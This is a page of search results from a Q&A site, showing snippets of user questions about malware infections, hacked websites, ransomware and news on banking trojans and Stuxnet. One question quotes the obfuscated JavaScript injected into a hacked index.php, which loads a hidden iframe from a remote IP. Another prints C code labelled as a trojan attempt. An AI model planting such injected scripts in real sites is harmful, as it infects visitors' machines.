Search Results

Search found 639 results on 26 pages for 'malware'.

  • How does Antimalware Doctor infect computers?

    - by Pyrolistical
    I didn't do anything stupid like run random .exe or visit questionable websites, but as I was just Googling I got infected by Antimalware Doctor. At that point I just shut down my computer and reformatted, so I didn't check if I had the latest version of Flash or Firefox. Is it possible to get infected just because I didn't have my Flash newer than 10.1 and some random flash ad infected me? There doesn't seem to be any information on how Antimalware Doctor works aside from how to remove it.

    Read the article

  • How did what appears to be a virus get on my computer? (explanation of situation enclosed)

    - by Massimo
    My system is Windows XP SP3, updated with the latest patches. The PC is connected to a Cisco 877 ADSL router, which does NAT from the internal network to its single static public IP address. There are no forwarded ports, and the router's management console can only be accessed from the inside. I was doing two things: working on a remote office machine via VPN and browsing some web pages on the Cisco web site. The remote network is absolutely safe (it's a lab network, four virtual servers, no publicly accessible services and no users at all; also, none of what I'm going to describe ever happened there). The Cisco web site... well, I suppose it is quite safe, too. Suddenly, something happened. Strange popups appear anywhere; programs claiming they're "antimalware", "antispyware" and so on begin autoinstalling; fake Windows Update and Security Center icons pop up in the system tray. svchost.exe began crashing repeatedly. Then, finally, after some minutes of this... BSOD. And, upon rebooting, BSOD again. Even in safe mode. Ok, that was obviously some virus/trojan/whatever. I had to install a new copy of Windows on another partition to clean things up. I found strange executables, services and DLLs almost anywhere. Amongst the other things, user32.dll and ndis.sys had been replaced. A fake software called "Antimalware Doctor" had been installed. There were services with completely random names or even GUIDs (!), and also ones called "IpSect" and "Darkness". There were executable files without an .exe extension. There were even two boot-class drivers, which I'm quite sure are the ones that finally caused the system to crash. A true massacre. Ok, now the questions: What the hell was that?!? It was something more than a simple virus! How did it manage to attack my computer, as I am behind a firewall and was not doing anything even only potentially harmful on the web at the time?

    Read the article

  • How do I properly check if a program is a virus/trojan in VMware?

    - by acidzombie24
    How should I check if a program is a virus in VMware? Some programs I do need admin ability to install and it makes sense. But how do I know if it's doing more than I want? Some thoughts are: how many processes open when I launch the application; what is added to the startup tab in msconfig; if any services are added. That's pretty much all my ideas. Even if it does something I recognize I wouldn't know if it's necessary or not. What are some rules of thumb? -Edit- What about registries, can I use that information to help? Maybe have a scanner tell me if the application I just used has messed with sections (like bootup) it shouldn't have?

    Read the article

  • How can I automatically require a password when connecting to a WD MyBookLive?

    - by user-123
    I have created a user which has specific privileges to access the shares on our WD MyBookLive Network drive (i.e. it requires a password to connect), however after connecting once Windows seems to remember the password (or at least for the rest of the session). How can I make it so it is necessary to require a password every time the user connects to the drive or makes some change on Windows? I am particularly thinking of Cryptolocker and other variants of "ransomware" which will try and connect to the drive and encrypt it.

    Read the article

  • Can't open Control Panel or IE

    - by Josh
    I have an XP computer where whenever I try to open Control Panel nothing happens, nothing flashes on the screen. Same thing with Internet Explorer. I've scanned the computer with Malwarebytes and Avast. Malwarebytes found some adware, which it removed without problems. Avast found nothing. I looked at the running processes with Process Explorer, nothing malicious running. And looked at a Process Monitor output when I tried to run IE, nothing obviously wrong. The process just decides to exit. What can I try next? I would suspect a corrupt IE install but Control Panel doesn't work either. UPDATE: Neither works in Safe Mode under the user account (only 1 user on the computer). But in Safe Mode, under the built-in Administrator account, they work. So whatever is broken is only broken in the one account. Anything under the HKCU registry key that could break this?

    Read the article

  • md5sum or sha1sum of legitimate Microsoft system files

    - by martyvis
    Is there a database or repository of the legitimate checksums for Microsoft system files? We think we have a 0day on DNS for Windows 2003 SP2 using IRC for command and control. (Latest McAfee does not see an issue). I want to compare our customer's dns.exe and associated DLLs with the real ones. (I will grab a fresh SP2 and hotfixed system to do this, but wonder how to do this in future without needing to do this.)

    Read the article

  • Tracing what program is making a network connection? (CentOS)

    - by Airjoe
    I was wondering if it is possible to find out which process is trying to make a specific network connection. On a server I support which hosts websites for about 200 users, the iptables firewall keeps blocking, as it should, a connection to 212.117.169.139 on port 80. Firefox reports this as an attack page (and at the least is obvious spam, if not malicious). It seems something on this server is trying to access this site for some reason, and although it's being blocked successfully, the requests seem to be going through every two to sixty seconds and I'd like to be able to find what process or script is doing this so I can handle it appropriately. Besides doing a grep to try and find if this IP is in some file (which probably won't even work because it may be working by hostname or it may be encoded), is there any way to find out some more information? Thanks!

    Read the article

  • Strange ports on default install of W7

    - by Sabre
    I have a base new install of Windows 7, and when I went to look for something else I saw the attached netstat output. What concerns me is that this is Windows + Truecrypt + drivers, nothing else installed. The sequential high ranged ports belonging to several different seemingly not out of place services seemed odd. So I torched the install, used Active@ to scrub the disk, re-downloaded the ISO from MSDN, and did a fresh reinstall; voilà, they are there again. It just seems out of place. I have seen many netstats over the years, and this one just strikes me as odd, so I started thinking rootkit? (Just FYI, when I reloaded I named the machine "Error" so that is why the task manager reads the computer name as such.) So I would like to know if anyone else could explain it, and therefore it may be normal, or would they be worried as well, and should I start considering I have some very strange thing occurring on my network?

    Read the article

  • File types and locations (if any) to exclude from AntiVirus scanning?

    - by CAD bloke
    Should I add any file types to my anti-virus's file type exclusion list? If so, which types? Should I add any locations (specifically for Windows 7) to an exclusion list? If so, which locations? Google found me a few references like http://support.microsoft.com/kb/822158 http://support.microsoft.com/kb/943556 and some site purporting to conduct expert sex changes but haven't found anything particularly confidence-inspiring.

    Read the article

  • Browser keeps being really rude to me today

    - by j-t-s
    Hi All, I've had this problem only once before, years ago. I bought a new computer the other day and last night I visited a website which Google Chrome suspected was an insecure site. So I proceeded to view the page anyway (Stupid, I know... But I was curious), and all of a sudden the window closed and ever since, every few minutes either Google Chrome or Internet Explorer keeps popping up with random websites, most of which are porn-related sites. I have downloaded ZoneAlarm, IOBit 360, Eset Smart Security and none of them reported any problems. I still have the rude browser problem. Can somebody please suggest any software/ways to fix this? (Other than to reformat please :)) Thank you :)

    Read the article

  • What are the most common dangerous domains that I should block?

    - by Dalia
    I am trying to configure my wireless router to block domains that are potentially dangerous to privacy, security, and bandwidth-hogs. Is there a list of domains that I can block at the router level? On a machine level, I have set the hosts file from www.mvps.org and that works on my machine. However, I want to implement something at the router level too - so that all computers in my household are somewhat protected.

    Read the article

  • Unidentified Window OnStartup

    - by CMP
    Every time I start up Windows Vista lately, I see a random floating window. It is a tiny little window with no title, and only the resize, maximize and restore buttons. I'd post an image, but I don't have reputation here yet. I can close it, and it does indeed go away, but I would love to figure out what it is and stop it from popping up at all. I used Autohotkey's window spy on it and all I learned is that it is a swing window, which doesn't help me out a whole lot. Is there a good way to identify which process it belongs to and figure out how to kill it?

    Read the article

  • Monitor programs accessing my keyboard?

    - by Anti Earth
    As of a few days ago, my computer is behaving 'erratically'. When I am typing, my pointer will randomly move to another place in the text and start typing a semi-random string of characters. ("gvyfn" is common; it has typed this about 8 times whilst I composed all the text above.) It often highlights part of or all the text and overwrites it. It sometimes goes into loops of pressing Control-Alt-Delete down, bringing up Windows 7 menu thing. It sometimes even messes with mouse clicks; they have unexpected results, like requesting admin privileges from applications, instead of switching to their window. I believe this is because it is holding an alt-function key down. This behaviour happens periodically, in waves. It might subside for an hour, then continue to haunt me. I believe it to be a virus or malicious program. My anti-virus (Symantec) and multiple MS rootkit removers could not find anything suspicious. I've noticed that sometimes it re-maps keys, and types gibberish when I press certain keys (though no pattern is evident). I believe a malicious program has installed a keyhook on my computer. I'm wondering... - Is there a way to let me view which programs are emulating keystrokes? - Is there a way to view what keyboard hooks are installed? (I'm also at liberty to try any other techniques to remove this blasted thing. It is easily the most frustrating computer problem I've encountered). Thanks!

    Read the article

  • All PHP files getting hacked

    - by nsearle
    Hey All, Like always, just want to say thank you for all of the help and input in advance. I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow something is getting into every single PHP file on my site and adding some malware code. I have deleted the code from every page multiple times and changed FTP and DB passwords, but to no avail. The code that is added looks like this - eval(base64_decode(string)) - where the string is 3024 characters. Not sure if anyone else has run into this problem or if anyone has ideas on how I can secure my PHP code. Thanks again.

    Read the article

  • what does this attempted trojan horse code do?

    - by bstullkid
    It looks like this just sends a ping, but what's the point of that when you can just use ping?

        /* WARNING: this is someone's attempt at writing a malware trojan. Do not
           compile and *definitely* don't install. I added an exit as the first
           line to avoid mishaps - msw */
        int main (int argc, char *argv[])
        {
            exit(1);
            unsigned int pid = 0;
            char buffer[2];
            char *args[] = { "/bin/ping", "-c", "5", NULL, NULL };
            if (argc != 2)
                return 0;
            args[3] = strdup(argv[1]);
            for (;;) {
                gets(buffer); /* FTW */
                if (buffer[0] == 0x6e)
                    break;
                switch (pid = fork()) {
                case -1:
                    printf("Error Forking\n");
                    exit(255);
                case 0:
                    execvp(args[0], args);
                    exit(1);
                default:
                    break;
                }
            }
            return 255;
        }

    Read the article

  • Zberp: the malware that combines the characteristics of Zeus and Carberp is "a hybrid monster" according to Trusteer researchers

    Zberp: the malware that combines the characteristics of Zeus and Carberp is "a hybrid monster" according to Trusteer researchers. Security researchers at Trusteer, an IBM subsidiary, have identified a new Trojan horse that combines the characteristics of Zeus and Carberp, two pieces of malware that have made attacks on online banking sites their specialty. Dubbed Zberp (Zeus + Carberp), the Trojan has already attacked more than 450 financial institutions around the world,...

    Read the article

  • Why would BitDefender Bootable Rescue CD be able to identify but unable to fix or delete malware?

    - by DaveDev
    Why would BitDefender Bootable Rescue CD (and loads of other Rescue CDs too) be able to identify but unable to fix or delete malware? It can however put it into quarantine. And what happens when the viruses are put into quarantine? It doesn't really mean anything if it can successfully put the malware into quarantine if it's a CD-bootable OS. It's only quarantined in the context of the memory it exists in. When I restart Windows, I'm still infected with loads of viruses. Thanks, Dave

    Read the article

  • Website index.php page changes automatically with one script in the end

    - by Mirage
    I have seen that this happened twice in my root index.php file. I have this thing added: <html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html> Does anyone know what that is and how it comes? When I tried to open my website in Google Chrome, it told me that some malicious software is trying to run from a harmful website, do you want to allow it. However, when I deleted that script, everything was OK. But this happened twice in 2 weeks. Is that the virus? How can something change my code? I am using Joomla.

    Read the article

  • My website is infected with JS:ScriptIP-inf [Trj]

    - by Rizwan Aaqil
    I am using Network Solutions hosting. I was recently attacked with JS:Illredir-S [Trj]. I asked my hosting providers to clean it and they cleaned it and updated all passwords, but now after a week my site got infected again with JS:ScriptIP-inf [Trj]. Can anyone please suggest how to secure my website properly? Should I change my hosting provider? I am fed up with these viruses again and again on my websites. I can't even find this virus in my files. Please post informative answers. Thanks

    Read the article

  • The mystery of the "Duqu Framework" is solved: the malware was reportedly written with a custom-made object-oriented C extension

    The mystery of the "Duqu Framework" is solved. The malware was reportedly written with a custom-made object-oriented C extension. Updated 20/03/2012 by MiaowZedong. Kaspersky researchers announced yesterday (19/03/2012) that they had solved the Duqu mystery "with a very high degree of certainty". Expert Igor Soumenkov begins by thanking the many developers who suggested avenues of investigation: he says he received more than 200 comments on his blog and 60+ emails. He therefore says "a big thank you" to all these participants. Among the various suggestions, LISP, Forth, Google Go, Erlang, Delphi, the com...

    Read the article

  • The Zeus/SpyEye Trojan grows stronger still with P2P and a data-sharing module; it should be the "star" of 2012 malware

    The Zeus/SpyEye Trojan horse grows stronger. With P2P and a data-sharing module, it should be the "star" of 2012 malware. SpyEye is back in the news. This "banking" Trojan horse spies on connections to online accounts and steals personal information (login, password, bank card numbers, ...). It can inject HTML code into machines, allowing whoever controls them to remotely access all the data. But SpyEye also has the distinctive feature of hiding fraudulent money transfers by displaying an incorrect account balance to the customer. The harm continues even after a person has...

    Read the article

  • iOS hacked using a malicious charger: hackers install malware on the iPhone in under a minute

    iOS hacked using a malicious charger. Hackers install malware on an iPhone in under a minute. When it comes to mobile device security, the tendency is to immediately single out devices running Android as the least secure of all. The name iOS never comes to mind, because many consider it a very secure platform. The myth has just been shattered. Three security researchers from the state of Georgia in the United States have just disclosed a flaw that lets a hacker install a malicious application on iOS without its owner noticing. Billy Lau, Yeongjin Lang and Che...

    Read the article

  • Source code of the ultra-sophisticated Carberp malware available for download, a bazooka in the hands of apprentice developers according to an expert

    The new ultra-sophisticated banking malware "Carberp" challenges Zeus. More and more malware targets Mozilla Firefox. Zeus, the Trojan horse whose main goals include the theft of banking information through keylogging (keystroke logging), had better watch out. A serious competitor has just declared war on it. Still undetectable by 5 of the 6 most widespread antivirus products, it is wreaking havoc, plundering bank accounts in Europe and America for the benefit of a group of criminals. Dubbed "Carberp", it uses mechanisms identical to those of Zeus and targets the most popular systems and browsers, namely Windows 7, Vista and XP, Internet Explorer and Moz...

    Read the article

  • Stuxnet - how it infects

    - by Kit Ong
    Excerpt from the CNET article. http://news.cnet.com/8301-13772_3-57413329-52/stuxnet-delivered-to-iranian-nuclear-plant-on-thumb-drive/?part=propeller&subj=news&tag=linkv The Stuxnet worm propagates by exploiting a hole in all versions of Windows in the code that processes shortcut files, ending in ".lnk," according to...[the] Microsoft Malware Protection Center.... Merely browsing to the removable media drive using an application that displays shortcut icons, such as Windows Explorer, will run the malware without the user clicking on the icons. The worm infects USB drives or other removable storage devices that are subsequently connected to the infected machine. Those USB drives then infect other machines much like the common cold is spread by infected people sneezing into their hands and then touching door knobs that others are handling. The malware includes a rootkit, which is software designed to hide the fact that a computer has been compromised, and other software that sneaks onto computers by using digital certificates signed by two Taiwanese chip manufacturers that are based in the same industrial complex in Taiwan--RealTek and JMicron, according to Chester Wisniewski, senior security advisor at Sophos.... It is unclear how the digital signatures were acquired by the attacker, but experts believe they were stolen and that the companies were not involved. Once the machine is infected, a Trojan looks to see if the computer it lands on is running Siemens' Simatic WinCC software. The malware then automatically uses a default password that is hard-coded into the software to access the control system's Microsoft SQL database.

    Read the article
